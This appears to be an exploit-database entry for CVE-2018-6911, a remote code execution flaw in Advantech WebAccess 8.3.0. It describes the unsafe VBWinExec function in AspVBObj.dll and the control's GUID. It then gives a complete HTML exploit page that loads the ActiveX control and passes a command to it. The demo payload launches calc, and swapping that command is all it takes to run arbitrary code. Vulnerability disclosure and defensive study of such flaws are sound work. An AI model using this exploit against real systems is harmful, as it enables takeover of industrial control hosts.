Lucene search

K
exploitpackNassim AsrirEXPLOITPACK:9C2620FAC6E0BA9E1EB9EA8D99661AE6
HistoryFeb 13, 2018 - 12:00 a.m.

Advantech WebAccess 8.3.0 - Remote Code Execution

2018-02-1300:00:00
Nassim Asrir
14

0.046 Low

EPSS

Percentile

92.6%

Advantech WebAccess 8.3.0 - Remote Code Execution

Vulnerability Title: Advantech WebAccess Node8.3.0 "AspVBObj.dll" - Remote Code Execution

Discovered by: Nassim Asrir 

Contact: [email protected] / https://www.linkedin.com/in/nassim-asrir-b73a57122/

CVE: CVE-2018-6911

Tested on: IE11 / Win10


Technical Details:
==================

The VBWinExec function in Node\AspVBObj.dll in Advantech WebAccess 8.3.0 allows remote attackers to execute arbitrary OS commands via a single argument.

Vulnerable File: C:\WebAccess\Node\AspVBObj.dll

Vulnerable Function: VBWinExec

Vulnerable Class: Include

Class Include
GUID: {55F52D11-CEA5-4D6C-9912-2C8FA03275CE}
Number of Interfaces: 1
Default Interface: _Include
RegKey Safe for Script: False
RegkeySafe for Init: False
KillBitSet: False

The VBWinExec function take one parameter and the user/attacker will be able to control it to execute OS command.

Function VBWinExec (
 	ByRef command  As String 
)

Exploit:
========

<title>Advantech WebAccess Node8.3.0 "AspVBObj.dll" - Remote Code Execution</title>
<BODY>
 <object id=rce classid="clsid:{55F52D11-CEA5-4D6C-9912-2C8FA03275CE}"></object>
 
<SCRIPT>
 
function exploit()
 {
     
     rce.VBWinExec("calc")
	
   
 }
 
</SCRIPT>
<input language=JavaScript onclick=exploit() type=button value="Exploit-Me"><br>
</body>
</HTML>

0.046 Low

EPSS

Percentile

92.6%

Related for EXPLOITPACK:9C2620FAC6E0BA9E1EB9EA8D99661AE6